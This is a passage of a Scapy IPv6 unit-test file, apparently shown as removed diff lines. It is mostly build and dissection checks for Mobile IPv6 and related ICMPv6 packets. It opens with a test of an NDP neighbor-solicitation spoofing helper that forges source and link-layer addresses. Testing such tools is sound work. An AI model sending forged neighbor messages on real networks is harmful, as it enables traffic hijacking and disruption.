NDP_Attack_NS_Spoofing - -r = test_attack(NDP_Attack_NS_Spoofing, [], options=("aa:aa:aa:aa:aa:aa", "753a:727c:97b5:f71d:51ea:3901:ab52:e110", "2001:db8::1", 'e4a0:654b:1a24:1b15:761d:2e5d:245d:ba83', "cc:cc:cc:cc:cc:cc", "dd:dd:dd:dd:dd:dd"))[0] - -assert r[Ether].dst == "dd:dd:dd:dd:dd:dd" -assert r[Ether].src == "cc:cc:cc:cc:cc:cc" -assert r[IPv6].hlim == 255 -assert r[IPv6].src == "753a:727c:97b5:f71d:51ea:3901:ab52:e110" -assert r[IPv6].dst == "e4a0:654b:1a24:1b15:761d:2e5d:245d:ba83" -assert r[ICMPv6ND_NS].tgt == "2001:db8::1" -assert r[ICMPv6NDOptSrcLLAddr].lladdr == "aa:aa:aa:aa:aa:aa" - -# Below is our Homework : here is the mountain ... -# - -########### ICMPv6MLReport Class #################################### -########### ICMPv6MLDone Class ###################################### -########### ICMPv6ND_Redirect Class ################################# -########### ICMPv6NDOptSrcAddrList Class ############################ -########### ICMPv6NDOptTgtAddrList Class ############################ -########### ICMPv6ND_INDSol Class ################################### -########### ICMPv6ND_INDAdv Class ################################### - -############ -############ -+ Home Agent Address Discovery - -= in6_getha() -in6_getha('2001:db8::') == '2001:db8::fdff:ffff:ffff:fffe' - -= ICMPv6HAADRequest - build/dissection -p = IPv6(raw(IPv6(dst=in6_getha('2001:db8::'), src='2001:db8::1')/ICMPv6HAADRequest(id=42))) -p.cksum == 0x9620 and p.dst == '2001:db8::fdff:ffff:ffff:fffe' and p.R == 1 - -= ICMPv6HAADReply - build/dissection -p = IPv6(raw(IPv6(dst='2001:db8::1', src='2001:db8::42')/ICMPv6HAADReply(id=42, addresses=['2001:db8::2', '2001:db8::3']))) -p.cksum = 0x3747 and p.addresses == [ '2001:db8::2', '2001:db8::3' ] - -= ICMPv6HAADRequest / ICMPv6HAADReply - build/dissection -a=ICMPv6HAADRequest(id=42) -b=ICMPv6HAADReply(id=42) -not a < b and a > b - - -############ -############ -+ Mobile Prefix Solicitation/Advertisement - -= ICMPv6MPSol - build (default values) - -s = b'`\x00\x00\x00\x00\x08:@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x92\x00m\xbb\x00\x00\x00\x00' -raw(IPv6()/ICMPv6MPSol()) == s - -= ICMPv6MPSol - dissection (default values) -p = IPv6(s) -p[ICMPv6MPSol].type == 146 and p[ICMPv6MPSol].cksum == 0x6dbb and p[ICMPv6MPSol].id == 0 - -= ICMPv6MPSol - build -s = b'`\x00\x00\x00\x00\x08:@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x92\x00(\x08\x00\x08\x00\x00' -raw(IPv6()/ICMPv6MPSol(cksum=0x2808, id=8)) == s - -= ICMPv6MPSol - dissection -p = IPv6(s) -p[ICMPv6MPSol].cksum == 0x2808 and p[ICMPv6MPSol].id == 8 - -= ICMPv6MPAdv - build (default values) -s = b'`\x00\x00\x00\x00(:@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x93\x00\xa8\xd6\x00\x00\x80\x00\x03\x04@\xc0\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -raw(IPv6()/ICMPv6MPAdv()/ICMPv6NDOptPrefixInfo()) == s - -= ICMPv6MPAdv - dissection (default values) -p = IPv6(s) -p[ICMPv6MPAdv].type == 147 and p[ICMPv6MPAdv].cksum == 0xa8d6 and p[ICMPv6NDOptPrefixInfo].prefix == '::' - -= ICMPv6MPAdv - build -s = b'`\x00\x00\x00\x00(:@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x93\x00(\x07\x00*@\x00\x03\x04@@\xff\xff\xff\xff\x00\x00\x00\x0c\x00\x00\x00\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' -raw(IPv6()/ICMPv6MPAdv(cksum=0x2807, flags=1, id=42)/ICMPv6NDOptPrefixInfo(prefix='2001:db8::1', L=0, preferredlifetime=12)) == s - -= ICMPv6MPAdv - dissection -p = IPv6(s) -p[ICMPv6MPAdv].cksum == 0x2807 and p[ICMPv6MPAdv].flags == 1 and p[ICMPv6MPAdv].id == 42 and p[ICMPv6NDOptPrefixInfo].prefix == '2001:db8::1' and p[ICMPv6NDOptPrefixInfo].preferredlifetime == 12 - - -############ -############ -+ Type 2 Routing Header - -= IPv6ExtHdrRouting - type 2 - build/dissection -p = IPv6(raw(IPv6(dst='2001:db8::1', src='2001:db8::2')/IPv6ExtHdrRouting(type=2, addresses=['2001:db8::3'])/ICMPv6EchoRequest())) -p.type == 2 and len(p.addresses) == 1 and p.cksum == 0x2446 - -= IPv6ExtHdrRouting - type 2 - hashret - -p = IPv6()/IPv6ExtHdrRouting(addresses=["2001:db8::1", "2001:db8::2"])/ICMPv6EchoRequest() -p.hashret() == b" \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00:\x00\x00\x00\x00" - - -############ -############ -+ Mobility Options - Binding Refresh Advice - -= MIP6OptBRAdvice - build (default values) -s = b'\x02\x02\x00\x00' -raw(MIP6OptBRAdvice()) == s - -= MIP6OptBRAdvice - dissection (default values) -p = MIP6OptBRAdvice(s) -p.otype == 2 and p.olen == 2 and p.rinter == 0 - -= MIP6OptBRAdvice - build -s = b'\x03*\n\xf7' -raw(MIP6OptBRAdvice(otype=3, olen=42, rinter=2807)) == s - -= MIP6OptBRAdvice - dissection -p = MIP6OptBRAdvice(s) -p.otype == 3 and p.olen == 42 and p.rinter == 2807 - - -############ -############ -+ Mobility Options - Alternate Care-of Address - -= MIP6OptAltCoA - build (default values) -s = b'\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -raw(MIP6OptAltCoA()) == s - -= MIP6OptAltCoA - dissection (default values) -p = MIP6OptAltCoA(s) -p.otype == 3 and p.olen == 16 and p.acoa == '::' - -= MIP6OptAltCoA - build -s = b'*\x08 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' -raw(MIP6OptAltCoA(otype=42, olen=8, acoa='2001:db8::1')) == s - -= MIP6OptAltCoA - dissection -p = MIP6OptAltCoA(s) -p.otype == 42 and p.olen == 8 and p.acoa == '2001:db8::1' - - -############ -############ -+ Mobility Options - Nonce Indices - -= MIP6OptNonceIndices - build (default values) -s = b'\x04\x10\x00\x00\x00\x00' -raw(MIP6OptNonceIndices()) == s - -= MIP6OptNonceIndices - dissection (default values) -p = MIP6OptNonceIndices(s) -p.otype == 4 and p.olen == 16 and p.hni == 0 and p.coni == 0 - -= MIP6OptNonceIndices - build -s = b'\x04\x12\x00\x13\x00\x14' -raw(MIP6OptNonceIndices(olen=18, hni=19, coni=20)) == s - -= MIP6OptNonceIndices - dissection -p = MIP6OptNonceIndices(s) -p.hni == 19 and p.coni == 20 - - -############ -############ -+ Mobility Options - Binding Authentication Data - -= MIP6OptBindingAuthData - build (default values) -s = b'\x05\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -raw(MIP6OptBindingAuthData()) == s - -= MIP6OptBindingAuthData - dissection (default values) -p = MIP6OptBindingAuthData(s) -p.otype == 5 and p.olen == 16 and p.authenticator == 0 - -= MIP6OptBindingAuthData - build -s = b'\x05*\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\xf7' -raw(MIP6OptBindingAuthData(olen=42, authenticator=2807)) == s - -= MIP6OptBindingAuthData - dissection -p = MIP6OptBindingAuthData(s) -p.otype == 5 and p.olen == 42 and p.authenticator == 2807 - - -############ -############ -+ Mobility Options - Mobile Network Prefix - -= MIP6OptMobNetPrefix - build (default values) -s = b'\x06\x12\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -raw(MIP6OptMobNetPrefix()) == s - -= MIP6OptMobNetPrefix - dissection (default values) -p = MIP6OptMobNetPrefix(s) -p.otype == 6 and p.olen == 18 and p.plen == 64 and p.prefix == '::' - -= MIP6OptMobNetPrefix - build -s = b'\x06*\x02 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -raw(MIP6OptMobNetPrefix(olen=42, reserved=2, plen=32, prefix='2001:db8::')) == s - -= MIP6OptMobNetPrefix - dissection -p = MIP6OptMobNetPrefix(s) -p.olen == 42 and p.reserved == 2 and p.plen == 32 and p.prefix == '2001:db8::' - - -############ -############ -+ Mobility Options - Link-Layer Address (MH-LLA) - -= MIP6OptLLAddr - basic build -raw(MIP6OptLLAddr()) == b'\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00' - -= MIP6OptLLAddr - basic dissection -p = MIP6OptLLAddr(b'\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00') -p.otype == 7 and p.olen == 7 and p.ocode == 2 and p.pad == 0 and p.lla == "00:00:00:00:00:00" - -= MIP6OptLLAddr - build with specific values -raw(MIP6OptLLAddr(olen=42, ocode=4, pad=0xff, lla='EE:EE:EE:EE:EE:EE')) == b'\x07*\x04\xff\xee\xee\xee\xee\xee\xee' - -= MIP6OptLLAddr - dissection with specific values -p = MIP6OptLLAddr(b'\x07*\x04\xff\xee\xee\xee\xee\xee\xee') - -raw(MIP6OptLLAddr(olen=42, ocode=4, pad=0xff, lla='EE:EE:EE:EE:EE:EE')) -p.otype == 7 and p.olen == 42 and p.ocode == 4 and p.pad == 0xff and p.lla == "ee:ee:ee:ee:ee:ee" - - -############ -############ -+ Mobility Options - Mobile Node Identifier - -= MIP6OptMNID - basic build -raw(MIP6OptMNID()) == b'\x08\x01\x01' - -= MIP6OptMNID - basic dissection -p = MIP6OptMNID(b'\x08\x01\x01') -p.otype == 8 and p.olen == 1 and p.subtype == 1 and p.id == b"" - -= MIP6OptMNID - build with specific values -raw(MIP6OptMNID(subtype=42, id="someid")) == b'\x08\x07*someid' - -= MIP6OptMNID - dissection with specific values -p = MIP6OptMNID(b'\x08\x07*someid') -p.otype == 8 and p.olen == 7 and p.subtype == 42 and p.id == b"someid" - - - -############ -############ -+ Mobility Options - Message Authentication - -= MIP6OptMsgAuth - basic build -raw(MIP6OptMsgAuth()) == b'\x09\x11\x01\x00\x00\x00\x00AAAAAAAAAAAA' - -= MIP6OptMsgAuth - basic dissection -p = MIP6OptMsgAuth(b'\x09\x11\x01\x00\x00\x00\x00AAAAAAAAAAAA') -p.otype == 9 and p.olen == 17 and p.subtype == 1 and p.mspi == 0 and p.authdata == b"A"*12 - -= MIP6OptMsgAuth - build with specific values -raw(MIP6OptMsgAuth(authdata="B"*16, mspi=0xeeeeeeee, subtype=0xff)) == b'\t\x15\xff\xee\xee\xee\xeeBBBBBBBBBBBBBBBB' - -= MIP6OptMsgAuth - dissection with specific values -p = MIP6OptMsgAuth(b'\t\x15\xff\xee\xee\xee\xeeBBBBBBBBBBBBBBBB') -p.otype == 9 and p.olen == 21 and p.subtype == 255 and p.mspi == 0xeeeeeeee and p.authdata == b"B"*16 - - -############ -############ -+ Mobility Options - Replay Protection - -= MIP6OptReplayProtection - basic build -raw(MIP6OptReplayProtection()) == b'\n\x08\x00\x00\x00\x00\x00\x00\x00\x00' - -= MIP6OptReplayProtection - basic dissection -p = MIP6OptReplayProtection(b'\n\x08\x00\x00\x00\x00\x00\x00\x00\x00') -p.otype == 10 and p.olen == 8 and p.timestamp == 0 - -= MIP6OptReplayProtection - build with specific values -s = raw(MIP6OptReplayProtection(olen=42, timestamp=(72*31536000)<<32)) -s == b'\n*\x87V|\x00\x00\x00\x00\x00' - -= MIP6OptReplayProtection - dissection with specific values -p = MIP6OptReplayProtection(s) -p.otype == 10 and p.olen == 42 and p.timestamp == 9752118382559232000 -p.fields_desc[-1].i2repr("", p.timestamp) == 'Mon, 13 Dec 1971 23:50:39 +0000 (9752118382559232000)' - - -############ -############ -+ Mobility Options - CGA Parameters -= MIP6OptCGAParams - - -############ -############ -+ Mobility Options - Signature -= MIP6OptSignature - - -############ -############ -+ Mobility Options - Permanent Home Keygen Token -= MIP6OptHomeKeygenToken - - -############ -############ -+ Mobility Options - Care-of Test Init -= MIP6OptCareOfTestInit - - -############ -############ -+ Mobility Options - Care-of Test -= MIP6OptCareOfTest - - -############ -############ -+ Mobility Options - Automatic Padding - MIP6OptBRAdvice -= Mobility Options - Automatic Padding - MIP6OptBRAdvice -a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptBRAdvice()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x02\x02\x00\x00' -b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptBRAdvice()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x00\x02\x02\x00\x00\x01\x04\x00\x00\x00\x00' -c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptBRAdvice()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x02\x02\x00\x00\x01\x04\x00\x00\x00\x00' -d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptBRAdvice()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x00\x02\x02\x00\x00\x01\x02\x00\x00' -e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptBRAdvice()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x02\x02\x00\x00\x01\x02\x00\x00' -g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptBRAdvice()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x00\x02\x02\x00\x00\x01\x00' -h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptBRAdvice()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x02\x02\x00\x00\x01\x00' -i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptBRAdvice()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x00\x02\x02\x00\x00' -j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptBRAdvice()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x02\x02\x00\x00' -a and b and c and d and e and g and h and i and j - -############ -############ -+ Mobility Options - Automatic Padding - MIP6OptAltCoA -= Mobility Options - Automatic Padding - MIP6OptAltCoA -a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptAltCoA()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptAltCoA()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x00\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptAltCoA()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptAltCoA()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x01\x05\x00\x00\x00\x00\x00\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptAltCoA()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x01\x04\x00\x00\x00\x00\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptAltCoA()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x01\x03\x00\x00\x00\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptAltCoA()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x01\x02\x00\x00\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptAltCoA()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x01\x01\x00\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptAltCoA()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x01\x00\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -a and b and c and d and e and g and h and i and j - - -############ -############ -+ Mobility Options - Automatic Padding - MIP6OptNonceIndices -= Mobility Options - Automatic Padding - MIP6OptNonceIndices -a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptNonceIndices()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x04\x10\x00\x00\x00\x00\x01\x04\x00\x00\x00\x00' -b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptNonceIndices()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x00\x04\x10\x00\x00\x00\x00\x01\x02\x00\x00' -c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptNonceIndices()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x04\x10\x00\x00\x00\x00\x01\x02\x00\x00' -d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptNonceIndices()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x00\x04\x10\x00\x00\x00\x00\x01\x00' -e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptNonceIndices()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x04\x10\x00\x00\x00\x00\x01\x00' -g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptNonceIndices()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x00\x04\x10\x00\x00\x00\x00' -h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptNonceIndices()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x04\x10\x00\x00\x00\x00' -i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptNonceIndices()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x00\x04\x10\x00\x00\x00\x00\x01\x04\x00\x00\x00\x00' -j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptNonceIndices()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x04\x10\x00\x00\x00\x00\x01\x04\x00\x00\x00\x00' -a and b and c and d and e and g and h and i and j - - -############ -############ -+ Mobility Options - Automatic Padding - MIP6OptBindingAuthData -= Mobility Options - Automatic Padding - MIP6OptBindingAuthData -a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptBindingAuthData()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x05\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptBindingAuthData()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x01\x03\x00\x00\x00\x05\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptBindingAuthData()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x01\x02\x00\x00\x05\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptBindingAuthData()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x01\x01\x00\x05\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptBindingAuthData()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x01\x00\x05\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptBindingAuthData()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x00\x05\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptBindingAuthData()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x05\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptBindingAuthData()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x01\x05\x00\x00\x00\x00\x00\x05\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptBindingAuthData()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x01\x04\x00\x00\x00\x00\x05\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -a and b and c and d and e and g and h and i and j - - -############ -############ -+ Mobility Options - Automatic Padding - MIP6OptMobNetPrefix -= Mobility Options - Automatic Padding - MIP6OptMobNetPrefix -a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptMobNetPrefix()])) == b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x06\x12\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptMobNetPrefix()])) == b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x01\x05\x00\x00\x00\x00\x00\x06\x12\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptMobNetPrefix()])) == b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x01\x04\x00\x00\x00\x00\x06\x12\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptMobNetPrefix()])) == b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x01\x03\x00\x00\x00\x06\x12\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptMobNetPrefix()])) == b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x01\x02\x00\x00\x06\x12\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptMobNetPrefix()])) == b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x01\x01\x00\x06\x12\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptMobNetPrefix()])) == b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x01\x00\x06\x12\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptMobNetPrefix()])) == b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x00\x06\x12\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptMobNetPrefix()])) == b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x06\x12\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -a and b and c and d and e and g and h and i and j - - -############ -############ -+ Mobility Options - Automatic Padding - MIP6OptLLAddr -= Mobility Options - Automatic Padding - MIP6OptLLAddr -a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptLLAddr()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00' -b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptLLAddr()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00\x00' -c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptLLAddr()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00' -d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptLLAddr()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00\x01\x05\x00\x00\x00\x00\x00' -e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptLLAddr()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00\x01\x04\x00\x00\x00\x00' -g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptLLAddr()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00\x01\x03\x00\x00\x00' -h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptLLAddr()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00' -i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptLLAddr()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00\x01\x01\x00' -j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptLLAddr()])) 